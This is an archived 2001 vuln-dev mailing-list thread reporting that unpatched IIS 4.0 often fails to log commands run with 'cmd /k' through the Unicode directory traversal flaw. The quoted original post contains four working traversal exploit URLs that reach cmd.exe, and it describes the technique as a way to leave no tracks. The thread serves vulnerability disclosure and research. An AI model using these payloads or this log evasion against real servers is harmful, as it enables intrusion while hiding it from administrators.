Vulnerability Development mailing list archives

RE: sometimes IIS 4.0 don't write logs.


From: ThEye <theye () 350cc com>
Date: Thu, 20 Dec 2001 14:54:55 -0500

Pablo Aravena said:
The problem looks like this:

        CMD /K [command]  Execute a command and "still active"
        CMD /C [command]  Execute a command and then finished.

        If you execute a cmd.exe?/k request this would be in active state
        until it has finished this process, instead of the cmd.exe?/c request
        that finishes the process immediately. Because of this, IIS does
        not log the process that has not come to an end.

That's right, but if an attacker sends a remote request to "cmd /k" no process "cmd" will appear in the webserver's list of processes, so this is an unusual behavior, because if a local user of the NT box calls "cmd /k" locally that process will appear in the list of processes. In addition, if the attacker calls "cmd /k" remotely his browser will seem to be waiting for the webserver's answer (that happens because CMD is still running due to the "K" option), so if he stops the browser (pressing ESC) he will stop the "cmd /k" remote process but IIS doesn't log it.

Roberto Alamos M. (theye () 350cc com)
www.350cc.com


> -----Original Message-----
> From:   ThEye [SMTP:theye () 350cc com]
> Sent:   Thursday, 20 December 2001 0:39
> To: vuln-dev () securityfocus com
> CC:   ndr113 () 350cc com
> Subject:       sometimes IIS 4.0 don't write logs.
>
> Hi:
>
> I don't know if this problem is documented but I didn't find anything
> about it anywhere.
>
> The problem is the following one:
>
> + Problem:
> When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
> Traversal Vulnerability" ( BugtraqID = 1806 ) I found that if the
> attacker uses the "k" option of cmd ( cmd /k ) instead of the "c" option
> (cmd /c), IIS 4.0 (with Extended Unicode Directory Traversal Vulnerability)
> sometimes doesn't write logs of the attacker's activity.
>
> + Implications:
> If an attacker uses this vulnerability to crack a web page or anything,
> eventually no tracks will exist on the attacked server.
>
> + Final:
> In PROBLEM I said "sometimes" because after a high number of requests to
> "cmd /k", IIS 4.0 writes logs of some requests; still I don't know when
> and why IIS 4.0 writes logs of the "cmd /k" request.
> Anyone that can confirm or refute this please post it.
>
>
> + Exploit:
> I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
> ( without any patch ).
>
> http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
> http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
>
> Result: No tracks on log files.
>
> + More Information:
> 1) Microsoft IIS and PWS Extended Unicode Directory Traversal
>
> http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
> 2) Microsoft Patch prmcan4i
>
> http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-US/prmcan4i.exe
>
> Roberto Alamos M. (theye () 350cc com)
> www.350cc.com

